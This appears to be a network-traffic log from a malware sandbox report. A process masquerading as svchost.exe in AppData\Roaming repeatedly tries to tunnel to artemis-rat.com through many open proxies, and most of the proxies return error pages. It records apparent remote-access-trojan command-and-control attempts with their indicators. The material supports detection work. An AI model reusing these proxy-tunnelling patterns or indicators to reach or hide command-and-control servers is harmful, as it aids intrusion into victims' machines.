Mar 9, 2024 13:14:37.763849974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3653	192.168.2.5	61519	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.764127970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3654	192.168.2.5	58383	185.49.31.207	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.773324013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3655	192.168.2.5	58197	51.38.63.124	27294	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.787482977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3656	192.168.2.5	61525	119.3.215.41	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.792732000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3657	192.168.2.5	61576	107.180.88.173	35774	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.792732954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378304958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3658	192.168.2.5	58181	190.211.161.210	32410	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.794528008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3659	192.168.2.5	61591	184.170.248.5	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.802844048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3660	192.168.2.5	61609	103.35.189.217	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.803114891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378201008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3661	192.168.2.5	60183	213.184.153.66	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.819895983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3662	192.168.2.5	58449	184.105.182.254	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.821794987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3663	192.168.2.5	61558	61.129.2.212	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.829351902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.172162056 CET	726	IN	HTTP/1.1 502 Bad Gateway Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:11:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3664	192.168.2.5	58414	12.186.205.120	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.844712019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.036645889 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3665	192.168.2.5	61647	154.208.10.126	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.845103979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.007239103 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3666	192.168.2.5	61510	222.138.76.6	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.851227999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.370368004 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3667	192.168.2.5	58409	162.214.163.137	50509	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.865628958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3668	192.168.2.5	57692	111.16.50.12	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.866271973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3669	192.168.2.5	61685	172.67.38.96	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.877151012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.031450033 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3670	192.168.2.5	61539	94.131.63.120	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.903801918 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3671	192.168.2.5	61662	38.54.6.39	9080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.907161951 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3672	192.168.2.5	60463	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.924510956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3673	192.168.2.5	61596	91.134.140.160	57320	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.940517902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.879935026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3674	192.168.2.5	61623	43.131.248.165	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.941548109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3675	192.168.2.5	61729	172.67.181.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.950696945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.108165026 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3676	192.168.2.5	61646	31.207.38.66	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.977637053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.282212973 CET	408	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:38 GMT Server: Apache Allow: OPTIONS,HEAD,GET,POST Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3677	192.168.2.5	61759	172.67.255.224	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
